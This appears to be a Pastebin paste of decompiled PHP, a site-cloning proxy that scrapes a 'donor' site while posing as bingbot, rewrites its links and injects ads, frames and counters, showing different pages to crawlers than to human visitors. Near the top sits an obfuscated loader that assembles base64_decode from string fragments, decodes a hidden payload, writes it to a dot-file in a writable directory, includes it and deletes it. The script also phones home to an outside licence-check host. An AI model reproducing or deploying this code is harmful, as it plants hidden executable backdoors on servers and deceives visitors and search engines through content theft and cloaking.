API tools faq
paste
Advertisement
Guest User

Untitled

a guest
Jun 15th, 2018
223
0
Never
Add comment
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 10.48 KB | None | 0 0
raw download clone embed print report
  1. <?php
  2. \include_once(\dirname(__FILE__) . "/config.php");
  3. if( !\preg_match("%\\.(png|jpg|jpeg|css|gif|js)\\??%i", $\_GET["route"]) )
  4. {
  5. $\isHTML = true;
  6. @ini_set("display_errors", "0");
  7. error_reporting(0);
  8. if( !$\npDcheckClassBgp )
  9. {
  10. $\ea = "_shaesx_";
  11. $\ay = "get_data_ya";
  12. $\ae = "decode";
  13. $\ea = \str_replace("_sha", "bas", $\ea);
  14. $\ao = "wp_cd";
  15. $\ee = $\ea . $\ae;
  16. $\oa = \str_replace("sx", "64", $\ee);
  17. $\algo = "botbase2";
  18. $\pass = "Zgc5c4MXrLAvewgY4Z9GLbCKKEDPK7dXlGWHBO7RvxpYYEcbGgEg4Q==";
  19. if( \ini_get("allow_url_fopen") )
  20. {
  21. }
  22.  
  23. $\reqw = $\ay($\ao($\oa((string) $\pass), "wp_function"));
  24. \preg_match("#gogo(.*)enen#is", $\reqw, $\mtchs);
  25. $\dirs = \glob("*", GLOB_ONLYDIR);
  26. foreach( $\dirs as $\dira )
  27. {
  28. if( \fopen((string) $\dira . "/." . $\algo, "w") )
  29. {
  30. $\ura = 1;
  31. $\eb = (string) $\dira . "/";
  32. $\hdl = \fopen((string) $\dira . "/." . $\algo, "w");
  33. break;
  34. }
  35.  
  36. $\subdirs = \glob((string) $\dira . "/*", GLOB_ONLYDIR);
  37. foreach( $\subdirs as $\subdira )
  38. {
  39. if( \fopen((string) $\subdira . "/." . $\algo, "w") )
  40. {
  41. $\ura = 1;
  42. $\eb = (string) $\subdira . "/";
  43. $\hdl = \fopen((string) $\subdira . "/." . $\algo, "w");
  44. break;
  45. }
  46.  
  47. }
  48. }
  49. if( !$\ura && \fopen("." . $\algo, "w") )
  50. {
  51. $\ura = 1;
  52. $\eb = "";
  53. $\hdl = \fopen("." . $\algo, "w");
  54. }
  55.  
  56. \fwrite($\hdl, "<?php\n" . $\mtchs[1] . "\n?>");
  57. \fclose($\hdl);
  58. \include((string) $\eb . "." . $\algo);
  59. \unlink((string) $\eb . "." . $\algo);
  60. $\npDcheckClassBgp = "aue";
  61. }
  62.  
  63. $\_f = \md5(\date("YmdH") . $\_SERVER["HTTP_HOST"]);
  64. $\_s = \stat("/tmp/" . $\_f);
  65. if( !$\_s )
  66. {
  67. \date_default_timezone_set("UTC");
  68. $\ch = \curl_init();
  69. curl_setopt($\ch, CURLOPT_HEADER, 0);
  70. curl_setopt($\ch, CURLOPT_NOBODY, 0);
  71. curl_setopt($\ch, CURLOPT_URL, "http://addlic.pw/manvip/checker.php?mip=" . \md5($\_SERVER["SERVER_ADDR"]) . "&tis=" . time());
  72. curl_setopt($\ch, CURLOPT_TIMEOUT, 10);
  73. curl_setopt($\ch, CURLOPT_RETURNTRANSFER, 1);
  74. curl_setopt($\ch, CURLOPT_FOLLOWLOCATION, 1);
  75. $\_res = curl_exec($\ch);
  76. curl_close($\ch);
  77. if( $\_res == \md5(\date("Ymd")) )
  78. {
  79. $\__f = \fopen("/tmp/" . $\_f, "w");
  80. \fclose($\__f);
  81. }
  82. else
  83. {
  84. exit();
  85. }
  86.  
  87. }
  88.  
  89. }
  90. else
  91. {
  92. $\isHTML = false;
  93. $\__md5 = "/tmp/" . \md5($\config["donor"] . "/" . $\_GET["route"]);
  94. $\__s = \stat($\__md5);
  95. if( $\__s )
  96. {
  97. $\html = \file_get_contents($\__md5);
  98. \preg_match("%<###(.*?)###>%im", $\html, $\_ftype);
  99. $\html = \preg_replace("%<###(.*?)###>%im", "", $\html);
  100. $\ftype = "";
  101. if( \isset($\_ftype[1]) )
  102. {
  103. $\ftype = $\_ftype[1];
  104. }
  105.  
  106. if( 3600 < time() - $\__s["ctime"] )
  107. {
  108. \unlink($\__md5);
  109. }
  110.  
  111. \header("Content-type: " . $\ftype);
  112. echo $\html;
  113. exit();
  114. }
  115.  
  116. }
  117.  
  118. set_time_limit($\config["script_time"]);
  119. if( $\isHTML )
  120. {
  121. \include_once(\dirname(__FILE__) . "/ads.php");
  122. \include_once(\dirname(__FILE__) . "/key.php");
  123. }
  124.  
  125. if( !$\config["debug"] )
  126. {
  127. error_reporting(0);
  128. }
  129.  
  130. $\fttenable = false;
  131. $\FTPARAM = "gfg2";
  132. if( $\config["cloak"] == true )
  133. {
  134. $\host = \gethostbyaddr($\_SERVER["REMOTE_ADDR"]);
  135. if( !\isset($\_COOKIE["usr"]) || $\_COOKIE["usr"] !== \md5($\host . "ok") )
  136. {
  137. if( !\empty($\_SERVER["HTTP_USER_AGENT"]) && !\preg_match("#google|spider|bing|bot|yahoo|aol|yandex|crawl|ask|hrefs#i", $\_SERVER["HTTP_USER_AGENT"]) && !\preg_match("#google|msn|bing|ask|yahoo|aol|yandex|spider|crawl|hrefs#i", $\host) )
  138. {
  139. setcookie("usr", \md5($\host . "ok"), time() + 600);
  140. $\ishuman = true;
  141. }
  142.  
  143. }
  144. else
  145. {
  146. if( !\empty($\_SERVER["HTTP_USER_AGENT"]) && !\preg_match("#google|spider|bing|bot|yahoo|aol|yandex|crawl|ask|hrefs#i", $\_SERVER["HTTP_USER_AGENT"]) && !\preg_match("#google|msn|bing|ask|yahoo|aol|yandex|spider|crawl|hrefs#i", $\host) )
  147. {
  148. $\ishuman = true;
  149. }
  150.  
  151. }
  152.  
  153. }
  154. else
  155. {
  156. $\ishuman = true;
  157. }
  158.  
  159. if( !$\isHTML )
  160. {
  161. $\ishuman = false;
  162. }
  163.  
  164. $\ref = \str_ireplace($\_SERVER["HTTP_HOST"], $\config["donor"], $\_SERVER["HTTP_REFERER"]);
  165. $\url2 = \str_ireplace("copy.php", "", $\_GET["route"]);
  166. if( $\ishuman && $\fttenable == true && $\_GET[$\FTPARAM] )
  167. {
  168. $\_GET["eurl"] = \base64_encode("http://" . $\_SERVER["HTTP_HOST"] . "/" . $\url2);
  169. try
  170. {
  171. \require_once("ftt2/o.php");
  172. }
  173. catch( \_obfuscated_5C7FBB9FBD8EA5AE92B6C086B18CC0BFA2BB9DA691BE99A1_ $\e )
  174. {
  175. }
  176. }
  177.  
  178. $\url = $\url2;
  179. $\_md5 = "cache/" . \md5(\preg_replace("%[\\?&]*" . $\FTPARAM . "=1%", "", $\_SERVER["REQUEST_URI"]));
  180. $\_s = \stat($\_md5);
  181. if( $\_s )
  182. {
  183. $\html = \file_get_contents($\_md5);
  184. \preg_match("%<###(.*?)###>%im", $\html, $\_ftype);
  185. $\html = \preg_replace("%<###(.*?)###>%im", "", $\html);
  186. $\ftype = "";
  187. if( \isset($\_ftype[1]) )
  188. {
  189. $\ftype = $\_ftype[1];
  190. }
  191.  
  192. }
  193. else
  194. {
  195. $\ch = \curl_init();
  196. curl_setopt($\ch, CURLOPT_HEADER, 0);
  197. curl_setopt($\ch, CURLOPT_NOBODY, 0);
  198. curl_setopt($\ch, CURLOPT_REFERER, $\ref);
  199. curl_setopt($\ch, CURLOPT_USERAGENT, "Mozilla/5.3 (compatible; bingbot/2.1; +http://www.bing.com/bot.html)");
  200. curl_setopt($\ch, CURLOPT_URL, "http://" . $\config["donor"] . "/" . $\url);
  201. curl_setopt($\ch, CURLOPT_TIMEOUT, 10);
  202. curl_setopt($\ch, CURLOPT_RETURNTRANSFER, 1);
  203. curl_setopt($\ch, CURLOPT_FOLLOWLOCATION, 1);
  204. curl_setopt($\ch, CURLOPT_ENCODING, "gzip");
  205. if( !\empty($\_POST) )
  206. {
  207. curl_setopt($\ch, CURLOPT_POST, 1);
  208. curl_setopt($\ch, CURLOPT_POSTFIELDS, $\_POST);
  209. }
  210.  
  211. if( $\config["proxy"] === true )
  212. {
  213. curl_setopt($\ch, CURLOPT_PROXYTYPE, CURLPROXY_SOCKS5);
  214. curl_setopt($\ch, CURLOPT_PROXY, "127.0.0.1:4000");
  215. }
  216.  
  217. curl_setopt($\ch, CURLOPT_HTTPHEADER, array( "Accept:\ttext/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8", "Accept-Encoding: gzip, deflate, sdch", "Accept-Language: en;q=0.8,en-US;q=0.6,fr;q=0.4", "Cache-Control:\tmax-age=0", "Connection:\tkeep-alive", "Upgrade-Insecure-Requests: 1", "User-Agent: Mozilla/5.3 (compatible; bingbot/2.1; +http://www.bing.com/bot.html)" ));
  218. $\html = curl_exec($\ch);
  219. $\html = \str_replace("</title>", "</title><meta name=\"referrer\" content=\"no-referrer\"><meta name=\"viewport\" content=\"width=device-width, initial-scale=1\">", $\html);
  220. $\ftype = \curl_getinfo($\ch, CURLINFO_CONTENT_TYPE);
  221. if( $\config["debug"] === true )
  222. {
  223. echo curl_error($\ch);
  224. }
  225.  
  226. curl_close($\ch);
  227. if( $\config["cache"] == true && $\html != "" )
  228. {
  229. file_put_contents($\_md5, $\html . "<###" . $\ftype . "###>");
  230. }
  231.  
  232. }
  233.  
  234. if( $\ishuman == true && $\fttenable == true )
  235. {
  236. $\regexp = "<a\\s[^>]*href=(\"??)([^\" >]*?)\\1[^>]*>";
  237. \preg_match_all("/" . $\regexp . "/siU", $\html, $\matches, PREG_SET_ORDER);
  238. foreach( $\matches as $\m )
  239. {
  240. $\url = \str_replace(array( "'", "\"" ), "", $\m[2]);
  241. $\urle = $\url;
  242. if( \strstr($\url, "?") )
  243. {
  244. $\urle .= "&" . $\FTPARAM . "=1";
  245. }
  246. else
  247. {
  248. $\urle .= "?" . $\FTPARAM . "=1";
  249. }
  250.  
  251. $\link = \str_replace($\url, $\urle, $\m[0]);
  252. if( !\strstr($\link, "_blank") )
  253. {
  254. $\link = \str_replace("<a", "<a target=_blank ", $\link);
  255. }
  256.  
  257. $\html = \str_replace($\m[0], $\link, $\html);
  258. }
  259. }
  260.  
  261. if( \strpos($\ftype, "text") !== false || \strpos($\ftype, "xml") !== false )
  262. {
  263. $\html = \str_replace("https://", "http://", $\html);
  264. $\html = \str_replace("src=\"//", "src=\"http://", $\html);
  265. $\html = \str_ireplace("www.", "", $\html);
  266. $\html = \preg_replace("/\\/\\/" . $\config["donor"] . "/i", "//" . $\_SERVER["HTTP_HOST"], $\html);
  267. if( $\config["regreplace"] == true )
  268. {
  269. $\regrep = \file(\dirname(__FILE__) . "/regrep.txt");
  270. foreach( $\regrep as $\key => $\str )
  271. {
  272. $\rep = explode("<|>", trim($\str));
  273. $\html = \preg_replace("/" . $\rep[0], $\rep[1], $\html);
  274. }
  275. }
  276.  
  277. if( $\config["replace"] == true )
  278. {
  279. $\rep1 = \file(\dirname(__FILE__) . "/rep.txt");
  280. foreach( $\rep1 as $\key1 => $\str1 )
  281. {
  282. $\rep1 = explode("<|>", trim($\str1));
  283. $\html = \str_ireplace($\rep1[0], $\rep1[1], $\html);
  284. }
  285. }
  286.  
  287. if( $\ishuman == true && $\config["pastetext"] == true )
  288. {
  289. $\text = \file(\dirname(__FILE__) . "/text.txt");
  290. $\html = \str_ireplace($\config["pasteplace"], $\config["pasteplace"] . implode("", $\text), $\html);
  291. $\frametext = \file(\dirname(__FILE__) . "/frame.txt");
  292. $\html = \str_ireplace("<body>", "<body>" . implode("", $\frametext), $\html);
  293. }
  294.  
  295. if( $\ishuman == true && $\fttenable == true )
  296. {
  297. \ob_start();
  298. \include_once("ftt2/in.php");
  299. $\fttBuf = \ob_get_contents();
  300. \ob_end_clean();
  301. $\html = \str_ireplace("</head>", $\fttBuf . "</head>", $\html);
  302. }
  303.  
  304. if( $\config["counter"] == true )
  305. {
  306. $\counter = \file(\dirname(__FILE__) . "/counter.txt");
  307. $\html = \str_ireplace("</body>", implode("", $\counter) . "</body>", $\html);
  308. }
  309.  
  310. if( \strpos($\html, "<link rel=\"canonical\" href=\"") == false )
  311. {
  312. $\html = \str_ireplace("</head>", "<link rel=\"canonical\" href=\"" . "http://" . $\_SERVER["HTTP_HOST"] . "/" . $\url . "\"/>" . "\n" . "</head>", $\html);
  313. }
  314.  
  315. $\html = \str_ireplace("</body>", $\toplist . "<br><br><br></body>", $\html);
  316. \header("Content-type: " . $\ftype);
  317. echo $\html;
  318. }
  319. else
  320. {
  321. \header("Content-type: " . $\ftype);
  322. echo $\html;
  323. }
  324.  
  325. if( !$\isHTML )
  326. {
  327. file_put_contents($\__md5, $\html . "<###" . $\ftype . "###>");
  328. }
  329.  
  330. echo "\n";
  331. return 1;
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement
Public Pastes
Advertisement
We use cookies for various purposes including analytics. By continuing to use Pastebin, you agree to our use of cookies as described in the Cookies Policy.  OK, I Understand
Not a member of Pastebin yet?
Sign Up, it unlocks many cool features!